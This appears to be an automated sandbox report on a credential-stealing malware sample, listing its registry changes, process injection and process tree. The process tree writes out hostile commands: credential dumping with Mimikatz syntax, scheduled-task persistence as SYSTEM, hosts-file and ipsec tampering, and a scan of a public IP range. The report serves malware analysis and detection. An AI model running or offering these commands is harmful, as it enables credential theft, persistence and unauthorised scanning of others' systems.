\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language benegiqll.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ruznevtjd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1980 cmd.exe 5092 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x000b000000023cad-6.dat nsis_installer_2 behavioral2/files/0x0007000000023cc4-15.dat nsis_installer_1 behavioral2/files/0x0007000000023cc4-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 43 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing byuzvnr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" byuzvnr.exe Key created \REGISTRY\USER\.DEFAULT\Software lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" byuzvnr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" byuzvnr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ byuzvnr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" byuzvnr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" byuzvnr.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 5092 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 456 schtasks.exe 1304 schtasks.exe 4292 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 1020 2024-11-11_5242cb7276376a1f7dee2e4e7a049015_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 1020 2024-11-11_5242cb7276376a1f7dee2e4e7a049015_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 4456 byuzvnr.exe Token: SeDebugPrivilege 2752 byuzvnr.exe Token: SeDebugPrivilege 440 vfshost.exe Token: SeDebugPrivilege 2444 lllgdyunt.exe Token: SeLockMemoryPrivilege 1120 uieubf.exe Token: SeLockMemoryPrivilege 1120 uieubf.exe Token: SeDebugPrivilege 4496 lllgdyunt.exe Token: SeDebugPrivilege 2896 lllgdyunt.exe Token: SeDebugPrivilege 4672 lllgdyunt.exe Token: SeDebugPrivilege 3528 lllgdyunt.exe Token: SeDebugPrivilege 3648 lllgdyunt.exe Token: SeDebugPrivilege 1640 lllgdyunt.exe Token: SeDebugPrivilege 4768 lllgdyunt.exe Token: SeDebugPrivilege 1668 lllgdyunt.exe Token: SeDebugPrivilege 1600 lllgdyunt.exe Token: SeDebugPrivilege 4360 lllgdyunt.exe Token: SeDebugPrivilege 2188 lllgdyunt.exe Token: SeDebugPrivilege 3296 lllgdyunt.exe Token: SeDebugPrivilege 1252 lllgdyunt.exe Token: SeDebugPrivilege 4512 lllgdyunt.exe Token: SeDebugPrivilege 4656 lllgdyunt.exe Token: SeDebugPrivilege 2800 lllgdyunt.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 1020 2024-11-11_5242cb7276376a1f7dee2e4e7a049015_hacktools_icedid_mimikatz.exe 1020 2024-11-11_5242cb7276376a1f7dee2e4e7a049015_hacktools_icedid_mimikatz.exe 4456 byuzvnr.exe 4456 byuzvnr.exe 2752 byuzvnr.exe 2752 byuzvnr.exe 2516 xohudmc.exe 4304 rwdxsq.exe 4844 byuzvnr.exe 4844 byuzvnr.exe 3320 byuzvnr.exe 3320 byuzvnr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1020 wrote to memory of 1980 1020 2024-11-11_5242cb7276376a1f7dee2e4e7a049015_hacktools_icedid_mimikatz.exe 83 PID 1020 wrote to memory of 1980 1020 2024-11-11_5242cb7276376a1f7dee2e4e7a049015_hacktools_icedid_mimikatz.exe 83 PID 1020 wrote to memory of 1980 1020 2024-11-11_5242cb7276376a1f7dee2e4e7a049015_hacktools_icedid_mimikatz.exe 83 PID 1980 wrote to memory of 5092 1980 cmd.exe 85 PID 1980 wrote to memory of 5092 1980 cmd.exe 85 PID 1980 wrote to memory of 5092 1980 cmd.exe 85 PID 1980 wrote to memory of 4456 1980 cmd.exe 97 PID 1980 wrote to memory of 4456 1980 cmd.exe 97 PID 1980 wrote to memory of 4456 1980 cmd.exe 97 PID 2752 wrote to memory of 2888 2752 byuzvnr.exe 99 PID 2752 wrote to memory of 2888 2752 byuzvnr.exe 99 PID 2752 wrote to memory of 2888 2752 byuzvnr.exe 99 PID 2888 wrote to memory of 3520 2888 cmd.exe 101 PID 2888 wrote to memory of 3520 2888 cmd.exe 101 PID 2888 wrote to memory of 3520 2888 cmd.exe 101 PID 2888 wrote to memory of 4788 2888 cmd.exe 102 PID 2888 wrote to memory of 4788 2888 cmd.exe 102 PID 2888 wrote to memory of 4788 2888 cmd.exe 102 PID 2888 wrote to memory of 432 2888 cmd.exe 103 PID 2888 wrote to memory of 432 2888 cmd.exe 103 PID 2888 wrote to memory of 432 2888 cmd.exe 103 PID 2888 wrote to memory of 4076 2888 cmd.exe 104 PID 2888 wrote to memory of 4076 2888 cmd.exe 104 PID 2888 wrote to memory of 4076 2888 cmd.exe 104 PID 2888 wrote to memory of 3364 2888 cmd.exe 105 PID 2888 wrote to memory of 3364 2888 cmd.exe 105 PID 2888 wrote to memory of 3364 2888 cmd.exe 105 PID 2888 wrote to memory of 5008 2888 cmd.exe 106 PID 2888 wrote to memory of 5008 2888 cmd.exe 106 PID 2888 wrote to memory of 5008 2888 cmd.exe 106 PID 2752 wrote to memory of 2244 2752 byuzvnr.exe 110 PID 2752 wrote to memory of 2244 2752 byuzvnr.exe 110 PID 2752 wrote to memory of 2244 2752 byuzvnr.exe 110 PID 2752 wrote to memory of 4808 2752 byuzvnr.exe 112 PID 2752 wrote to memory of 4808 2752 byuzvnr.exe 112 PID 2752 wrote to memory of 4808 2752 byuzvnr.exe 112 PID 2752 wrote to memory of 1544 2752 byuzvnr.exe 114 PID 2752 wrote to memory of 1544 2752 byuzvnr.exe 114 PID 2752 wrote to memory of 1544 2752 byuzvnr.exe 114 PID 2752 wrote to memory of 4296 2752 byuzvnr.exe 120 PID 2752 wrote to memory of 4296 2752 byuzvnr.exe 120 PID 2752 wrote to memory of 4296 2752 byuzvnr.exe 120 PID 4296 wrote to memory of 2848 4296 cmd.exe 122 PID 4296 wrote to memory of 2848 4296 cmd.exe 122 PID 4296 wrote to memory of 2848 4296 cmd.exe 122 PID 2848 wrote to memory of 1728 2848 wpcap.exe 123 PID 2848 wrote to memory of 1728 2848 wpcap.exe 123 PID 2848 wrote to memory of 1728 2848 wpcap.exe 123 PID 1728 wrote to memory of 1696 1728 net.exe 125 PID 1728 wrote to memory of 1696 1728 net.exe 125 PID 1728 wrote to memory of 1696 1728 net.exe 125 PID 2848 wrote to memory of 3648 2848 wpcap.exe 126 PID 2848 wrote to memory of 3648 2848 wpcap.exe 126 PID 2848 wrote to memory of 3648 2848 wpcap.exe 126 PID 3648 wrote to memory of 916 3648 net.exe 128 PID 3648 wrote to memory of 916 3648 net.exe 128 PID 3648 wrote to memory of 916 3648 net.exe 128 PID 2848 wrote to memory of 1172 2848 wpcap.exe 129 PID 2848 wrote to memory of 1172 2848 wpcap.exe 129 PID 2848 wrote to memory of 1172 2848 wpcap.exe 129 PID 1172 wrote to memory of 4444 1172 net.exe 131 PID 1172 wrote to memory of 4444 1172 net.exe 131 PID 1172 wrote to memory of 4444 1172 net.exe 131 PID 2848 wrote to memory of 2456 2848 wpcap.exe 132
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1868
-
C:\Windows\TEMP\nqazjegtg\uieubf.exe"C:\Windows\TEMP\nqazjegtg\uieubf.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1120
-
-
C:\Users\Admin\AppData\Local\Temp\2024-11-11_5242cb7276376a1f7dee2e4e7a049015_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-11-11_5242cb7276376a1f7dee2e4e7a049015_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1020 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\klhnlzly\byuzvnr.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:1980 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5092
-
-
C:\Windows\klhnlzly\byuzvnr.exeC:\Windows\klhnlzly\byuzvnr.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4456
-
-
-
C:\Windows\klhnlzly\byuzvnr.exeC:\Windows\klhnlzly\byuzvnr.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2752 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2888 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3520
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:4788
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:432
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:4076
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3364
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:5008
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2244
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4808
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1544
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\hgpuenbvt\lzvztyutv\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4296 -
C:\Windows\hgpuenbvt\lzvztyutv\wpcap.exeC:\Windows\hgpuenbvt\lzvztyutv\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2848 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:1696
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:3648 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:916
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1172 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:4444
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:2456 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:3440
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:832 -
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:432
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:3364
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:2340 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:4968 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:640
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\hgpuenbvt\lzvztyutv\benegiqll.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\hgpuenbvt\lzvztyutv\Scant.txt2⤵PID:1148
-
C:\Windows\hgpuenbvt\lzvztyutv\benegiqll.exeC:\Windows\hgpuenbvt\lzvztyutv\benegiqll.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\hgpuenbvt\lzvztyutv\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3964
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\hgpuenbvt\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\hgpuenbvt\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3548 -
C:\Windows\hgpuenbvt\Corporate\vfshost.exeC:\Windows\hgpuenbvt\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:440
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "zrhlvlrlm" /ru system /tr "cmd /c C:\Windows\ime\byuzvnr.exe"2⤵
- System Location Discovery: System Language Discovery
PID:1856 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1340
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "zrhlvlrlm" /ru system /tr "cmd /c C:\Windows\ime\byuzvnr.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:456
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "dlttkgzdu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\klhnlzly\byuzvnr.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:1612 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2060
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "dlttkgzdu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\klhnlzly\byuzvnr.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4292
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "yyqkeetlm" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\nqazjegtg\uieubf.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:636 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4988
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "yyqkeetlm" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\nqazjegtg\uieubf.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1304
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1640
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1616
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:852
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
